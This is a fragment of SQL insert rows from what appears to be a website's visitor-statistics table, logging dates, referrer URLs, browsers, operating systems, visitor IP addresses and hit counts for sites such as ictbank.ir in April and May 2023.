(32027,'2023-04-28','https://45.92.94.221/blog','Chrome','Windows','71.0.0','desktop','Unknown','','165.154.119.8','000',0,19,0),
(32028,'2023-04-28','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','93.90.200.43','000',0,1,0),
(32029,'2023-04-28','https://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','4.227.254.95','000',0,1,0),
(32030,'2023-04-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','52.56.118.3','000',0,3,0),
(32031,'2023-04-28','https://ictbank.ir/blog','Chrome','Android','85.0.0.0','mobile:smart','Redmi 4X','','89.111.132.36','000',0,2,0),
(32032,'2023-04-29','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','176.109.190.120','000',0,1,0),
(32033,'2023-04-29','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','92.205.3.41','000',0,1,0),
(32034,'2023-04-29','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(32035,'2023-04-29','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(32036,'2023-04-29','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.125.136.128','000',0,1,0),
(32037,'2023-04-29','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(32038,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(32039,'2023-04-29','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32040,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','197.144.73.221','000',0,2,0),
(32041,'2023-04-29','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','139.59.5.55','000',0,3,0),
(32042,'2023-04-29','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','203.150.228.102','000',0,15,0),
(32043,'2023-04-29','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.126','000',0,5,0),
(32044,'2023-04-29','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','176.109.227.87','000',0,2,0),
(32045,'2023-04-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(32046,'2023-04-29','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','74.80.208.53','000',0,17,0),
(32047,'2023-04-29','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,3,0),
(32048,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.191.217.55','000',0,1,0),
(32049,'2023-04-29','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','103.63.111.138','000',0,2,0),
(32050,'2023-04-29','http://ictbank.ir','Chrome','Windows','51.0.0.0','desktop','Unknown','','144.217.86.109','000',0,1,0),
(32051,'2023-04-29','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(32052,'2023-04-29','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','185.39.144.147','000',0,1,0),
(32053,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','176.31.110.126','000',0,3,0),
(32054,'2023-04-29','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(32055,'2023-04-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','198.204.238.211','000',0,1,0),
(32056,'2023-04-29','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,5,0),
(32057,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','5.252.230.173','000',0,1,0),
(32058,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','210.65.88.143','000',0,1,0),
(32059,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','51.159.18.207','000',0,1,0),
(32060,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','170.39.79.101','000',0,1,0),
(32061,'2023-04-29','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','121.78.147.109','000',0,13,0),
(32062,'2023-04-29','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','14.63.221.211','000',0,3,0),
(32063,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','54.255.31.139','000',0,1,0),
(32064,'2023-04-29','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','27.98.228.100','000',0,1,0),
(32065,'2023-04-29','https://ictbank.ir/hooman/admin/','Chrome','Windows','112.0.0.0','desktop','Unknown','','77.238.113.248','000',0,46,0),
(32066,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.146','000',0,1,0),
(32067,'2023-04-29','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','66.240.236.119','000',0,1,0),
(32068,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','179.43.142.31','000',0,1,0),
(32069,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','96.0.0.0','desktop','Unknown','','173.252.95.117','000',0,1,0),
(32070,'2023-04-29','https://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','34.223.48.26','000',0,1,0),
(32071,'2023-04-29','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.172','000',0,1,0),
(32072,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(32073,'2023-04-29','https://ictbank.ir/blog','Chrome','Windows','56.0.0.0','desktop','Unknown','','54.211.239.4','000',0,2,0),
(32074,'2023-04-30','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32075,'2023-04-30','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.172','000',0,15,0),
(32076,'2023-04-30','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','66.42.94.178','000',0,3,0),
(32077,'2023-04-30','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,14,0),
(32078,'2023-04-30','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(32079,'2023-04-30','https://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(32080,'2023-04-30','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','93.90.200.43','000',0,1,0),
(32081,'2023-04-30','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','104.243.26.114','000',0,1,0),
(32082,'2023-04-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(32083,'2023-04-30','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','104.192.7.204','000',0,1,0),
(32084,'2023-04-30','https://design-arena.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','65.21.6.144','000',0,4,0),
(32085,'2023-04-30','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.150.169','000',0,9,0),
(32086,'2023-04-30','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.9.227.178','000',0,1,0),
(32087,'2023-04-30','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.149.147.44','000',0,2,0),
(32088,'2023-04-30','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','49.51.187.248','000',0,1,0),
(32089,'2023-04-30','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','178.208.160.71','000',0,10,0),
(32090,'2023-04-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(32091,'2023-04-30','https://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(32092,'2023-04-30','https://ictbank.ir/hooman/admin/','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.237.153.200','000',0,47,0),
(32093,'2023-04-30','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.112','000',0,12,0),
(32094,'2023-04-30','http://design-arena.ir','Edge','Windows','86.0.0.0','desktop','Unknown','','199.249.230.159','000',0,1,0),
(32095,'2023-04-30','https://ictbank.ir/blog','Opera','Windows','11.0','desktop','Unknown','','99.81.216.206','000',0,1,0),
(32096,'2023-04-30','https://ictbank.ir/blog','Chrome','Android','111.0.0.0','mobile:smart','Galaxy A11','','164.90.179.124','000',0,1,0),
(32097,'2023-04-30','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','107.173.91.86','000',0,1,0),
(32098,'2023-04-30','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','23.95.232.212','000',0,1,0),
(32099,'2023-04-30','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','107.172.146.236','000',0,1,0),
(32100,'2023-04-30','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','69.90.139.244','000',0,1,0),
(32101,'2023-04-30','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(32102,'2023-05-01','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.112','000',0,16,0),
(32103,'2023-05-01','https://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.122','000',0,5,0),
(32104,'2023-05-01','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','5.188.86.230','000',0,1,0),
(32105,'2023-05-01','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','206.189.88.186','000',0,2,0),
(32106,'2023-05-01','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32107,'2023-05-01','http://ictbank.ir/wp-json/wp/v2/posts','Chrome','Windows','38.0.0.0','desktop','Unknown','','140.99.86.188','000',0,1,0),
(32108,'2023-05-01','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','93.90.200.43','000',0,2,0),
(32109,'2023-05-01','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(32110,'2023-05-01','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','116.118.50.209','000',0,1,0),
(32111,'2023-05-01','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(32112,'2023-05-01','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','190.92.159.48','000',0,1,0),
(32113,'2023-05-01','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(32114,'2023-05-01','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.14','000',0,1,0),
(32115,'2023-05-01','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.22','000',0,6,0),
(32116,'2023-05-01','https://ictbank.ir/hooman/admin/','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.237.160.235','000',0,229,0),
(32117,'2023-05-01','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,1,0),
(32118,'2023-05-01','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.162.22.65','000',0,2,0),
(32119,'2023-05-01','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','108.167.189.16','000',0,1,0),
(32120,'2023-05-01','https://ictbank.ir/sites/nikooacademy/wp-admin/','Chrome','OS X','112.0.0.0','desktop','Macintosh','','204.18.17.143','000',0,2,0),
(32121,'2023-05-01','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','5.44.254.163','000',0,1,0),
(32122,'2023-05-01','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(32123,'2023-05-01','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.237.80.126','000',0,1,0),
(32124,'2023-05-01','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','5.238.205.179','000',0,4,0),
(32125,'2023-05-01','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.149.245','000',0,9,0),
(32126,'2023-05-01','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','93.158.91.203','000',0,1,0),
(32127,'2023-05-01','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','93.158.91.229','000',0,1,0),
(32128,'2023-05-01','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','93.158.91.230','000',0,1,0),
(32129,'2023-05-01','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','93.158.91.205','000',0,1,0),
(32130,'2023-05-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(32131,'2023-05-01','https://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','34.223.108.79','000',0,1,0),
(32132,'2023-05-01','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(32133,'2023-05-01','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(32134,'2023-05-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(32135,'2023-05-01','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.80','000',0,1,0),
(32136,'2023-05-01','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','88.218.47.22','000',0,1,0),
(32137,'2023-05-01','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','212.119.44.23','000',0,1,0),
(32138,'2023-05-01','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','52.14.138.189','000',0,34,0),
(32139,'2023-05-01','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','45.159.21.211','000',0,1,0),
(32140,'2023-05-01','https://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','52.41.32.37','000',0,1,0),
(32141,'2023-05-01','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(32142,'2023-05-01','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','87.251.64.153','000',0,1,0),
(32143,'2023-05-01','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.93','000',0,1,0),
(32144,'2023-05-01','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','146.190.104.126','000',0,4,0),
(32145,'2023-05-02','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(32146,'2023-05-02','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.153','000',0,26,0),
(32147,'2023-05-02','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(32148,'2023-05-02','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,1,0),
(32149,'2023-05-02','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.77','000',0,2,0),
(32150,'2023-05-02','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','109.169.10.4','000',0,3,0),
(32151,'2023-05-02','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,4,0),
(32152,'2023-05-02','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(32153,'2023-05-02','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.55.162','000',0,1,0),
(32154,'2023-05-02','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','131.108.208.161','000',0,1,0),
(32155,'2023-05-02','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(32156,'2023-05-02','https://ictbank.ir/sites/nikooacademy/wp-admin/index.php','Chrome','OS X','112.0.0.0','desktop','Macintosh','','204.18.119.40','000',0,28,0),
(32157,'2023-05-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.168.66.0','000',0,1,0),
(32158,'2023-05-02','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(32159,'2023-05-02','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(32160,'2023-05-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(32161,'2023-05-02','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(32162,'2023-05-02','https://yandex.ru/','Yandex Browser','Windows','23.0.0.0','desktop','Unknown','','90.154.82.17','000',0,1,0),
(32163,'2023-05-02','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.189.151.32','000',0,1,0),
(32164,'2023-05-02','https://ictbank.ir/hooman/admin/','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.237.140.60','000',0,64,0),
(32165,'2023-05-02','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','104.209.128.205','000',0,3,0),
(32166,'2023-05-02','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','5.238.205.179','000',0,7,0),
(32167,'2023-05-02','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','5.44.254.163','000',0,1,0),
(32168,'2023-05-02','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(32169,'2023-05-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.125.151.118','000',0,1,0),
(32170,'2023-05-02','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.43.10.64','000',0,1,0),
(32171,'2023-05-02','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','162.240.52.12','000',0,1,0),
(32172,'2023-05-02','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','161.35.142.167','000',0,1,0),
(32173,'2023-05-02','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.121','000',0,2,0),
(32174,'2023-05-02','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','45.63.7.73','000',0,3,0),
(32175,'2023-05-02','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','18.117.110.151','000',0,9,0),
(32176,'2023-05-02','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.14','000',0,2,0),
(32177,'2023-05-02','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.93','000',0,1,0),
(32178,'2023-05-02','http://ictbank.ir/wp-json/wp/v2/posts','SeaMonkey','Windows','2.0.0','desktop','Unknown','','154.85.126.180','000',0,1,0),
(32179,'2023-05-02','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','178.254.0.165','000',0,1,0),
(32180,'2023-05-02','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','138.68.134.150','000',0,2,0),
(32181,'2023-05-02','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.129','000',0,1,0),
(32182,'2023-05-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(32183,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','208.91.64.43','000',0,3,0),
(32184,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(32185,'2023-05-03','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.185.4.36','000',0,1,0),
(32186,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.221','000',0,1,0),
(32187,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','69.167.12.39','000',0,10,0),
(32188,'2023-05-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.219.140.95','000',0,1,0),
(32189,'2023-05-03','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32190,'2023-05-03','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(32191,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','213.32.122.82','000',0,1,0),
(32192,'2023-05-03','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(32193,'2023-05-03','https://ictbank.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','93.159.230.89','000',0,1,0),
(32194,'2023-05-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.132.32','000',0,1,0),
(32195,'2023-05-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.219.136.138','000',0,1,0),
(32196,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.190.100.191','000',0,1,0),
(32197,'2023-05-03','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','51.222.44.188','000',0,3,0),
(32198,'2023-05-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.25.153.236','000',0,1,0),
(32199,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','109.229.213.23','000',0,1,0),
(32200,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(32201,'2023-05-03','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.241.133','000',0,4,0),
(32202,'2023-05-03','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.164','000',0,17,0),
(32203,'2023-05-03','https://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.121','000',0,1,0),
(32204,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','72.0','desktop','Unknown','','212.60.22.200','000',0,1,0),
(32205,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.220.254.250','000',0,1,0),
(32206,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,3,0),
(32207,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.11','000',0,1,0),
(32208,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.174.10.83','000',0,1,0),
(32209,'2023-05-03','https://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','23.90.160.138','000',0,2,0),
(32210,'2023-05-03','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(32211,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','43.130.13.197','000',0,15,0),
(32212,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','212.60.22.184','000',0,1,0),
(32213,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','74.0','desktop','Unknown','','194.87.206.106','000',0,1,0),
(32214,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','20.121.121.11','000',0,1,0),
(32215,'2023-05-03','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','100.25.246.112','000',0,1,0),
(32216,'2023-05-03','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','69.167.12.18','000',0,20,0),
(32217,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','139.59.10.149','000',0,1,0),
(32218,'2023-05-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','204.12.219.140','000',0,2,0),
(32219,'2023-05-03','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(32220,'2023-05-03','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','66.97.179.31','000',0,1,0),
(32221,'2023-05-03','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','124.152.188.61','000',0,1,0),
(32222,'2023-05-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.163.231.137','000',0,1,0),
(32223,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','185.27.99.112','000',0,1,0),
(32224,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','185.27.99.124','000',0,1,0),
(32225,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','185.27.99.141','000',0,1,0),
(32226,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','185.27.99.132','000',0,1,0),
(32227,'2023-05-03','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.161.119.147','000',0,1,0),
(32228,'2023-05-03','https://search.brave.com/','Chrome','OS X','112.0.0.0','desktop','Macintosh','','92.171.16.47','000',0,4,0),
(32229,'2023-05-04','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','92.171.16.47','000',0,1,0),
(32230,'2023-05-04','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(32231,'2023-05-04','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.135.167.80','000',0,1,0),
(32232,'2023-05-04','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(32233,'2023-05-04','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.241.24.104','000',0,1,0),
(32234,'2023-05-04','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.124','000',0,17,0),
(32235,'2023-05-04','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.28','000',0,1,0),
(32236,'2023-05-04','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.173','000',0,1,0),
(32237,'2023-05-04','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.77','000',0,1,0),
(32238,'2023-05-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.185','000',0,1,0),
(32239,'2023-05-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.142','000',0,1,0),
(32240,'2023-05-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','80.82.78.14','000',0,1,0),
(32241,'2023-05-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','146.59.44.45','000',0,5,0),
(32242,'2023-05-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.60','000',0,4,0),
(32243,'2023-05-04','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.189.19.117','000',0,1,0),
(32244,'2023-05-04','https://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','45.92.1.195','000',0,164,0),
(32245,'2023-05-04','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','13.232.247.113','000',0,1,0),
(32246,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','209.126.80.153','000',0,2,0),
(32247,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','134.209.105.160','000',0,2,0),
